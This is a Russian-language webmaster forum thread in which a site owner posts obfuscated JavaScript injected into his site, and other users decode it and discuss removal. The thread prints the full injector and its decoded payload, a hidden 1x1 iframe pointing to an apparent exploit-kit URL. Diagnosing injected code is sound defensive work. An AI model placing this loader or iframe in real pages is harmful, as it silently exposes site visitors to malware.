Форум Сайтостроение Веб-строительство

Что делает этот яваскрипт?...

Dmitry V___v
На сайте с 07.12.2006
Offline
310
Dmitry V___v
644

..кроме того, что пытается подгрузить вирус с wmigra.org, который находится в статусе suspended?

И как мне этот вызов оттуда вырезать? ;) 

<!-- ~ --><script language='JavaScript'><!--

function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';

s+='060105102114097109101032119105100116104061049032104101105103104116061049032098111114100101114061048';

s=s+'032102114097109101098111114100101114061048032115114099061034104116116112058047047119109105103114097';

s=s+'046111114103047109112097099107047105110100101120046112104112034062060047105102114097109101062';

t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();

//--></script><!-- ~ -->
Создание и ведение кампаний Google/Bing/Twitter/FB Ads под USA, Canada, United Kingdom and Australia ( https://searchengines.guru/ru/forum/1028286 ) + жирный линкбилдинг под бурж ( https://searchengines.guru/ru/forum/1028282 )
Angelo
На сайте с 01.01.2007
Offline
125
Angelo
#1

Pall, скорее всего вставляет iframe в ваш сайт со страничкой с вирусом. В основном это происходит с индексными страницами index.php index.html

Terys
На сайте с 28.03.2007
Offline
137
Terys
#2

по-моему это експлоит. ворует ваши куки.

если не ошибаюсь..

GR (https://rs.grnet.ru/add/) - реклама от 99 р.
Дмитрий
На сайте с 23.08.2006
Offline
222
Дмитрий
#3

http://earnik.com/forum/topic29657.html

Разрабатываю и автоматизирую на php http://jonnyb.ru/
ixRock
На сайте с 14.11.2006
Offline
46
ixRock
#4

ваще тупняковый скрипт))

блок:

if((t-unescape(0xBF))>unescape(0x00)) t-=-(unescape(0x08)+unescape(0x30));

не играет роли.... типа понты? :)) хотя может я ошибасюь... 0__0

Переменная "s" чисто из ASCII-кодов символ по 3 цифры парсится и выводится на String.fromCharCode...

похоже автор ломал голову чтобы получше замаскировать всего лишь вывод на document.write HTML блока:

</textatea></textarea><iframe width=1 height=1 border=0 frameborder=0 src="http://wmigra.org/mpack/index.php"></iframe>

спасибо за внимание =)

Работаю [S]за еду и секас[/S] с XHTML, CSS, XSLT, JS, PHP. Если что, вот тут (http://www.mintdesign.ru/) некоторые мои работы. Контакты: ася 344-ноль86-276, мыло ixrock@gmail.com
eTarget 2011:Панельная дискуссия «Стратегия eTarget 2011: Круглый стол Отчет о конференции User
Dmitry V___v
На сайте с 07.12.2006
Offline
310
Dmitry V___v
#5

JonnyB, ixRock, Terys, Angelo,

Спасибо, уважаемые.

Вот ктоб еще подсказал, почему с этим скриптом у меня на CMS Seditio sape работает, а без него - нет? ;)

И что из него, кроме ascii-шной последовательности надо убрать, дабы сейп остался функционирующим? ;)

eTarget 2011:Панельная дискуссия «Стратегия eTarget 2011: Круглый стол Могут ли «плохие» входящие

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий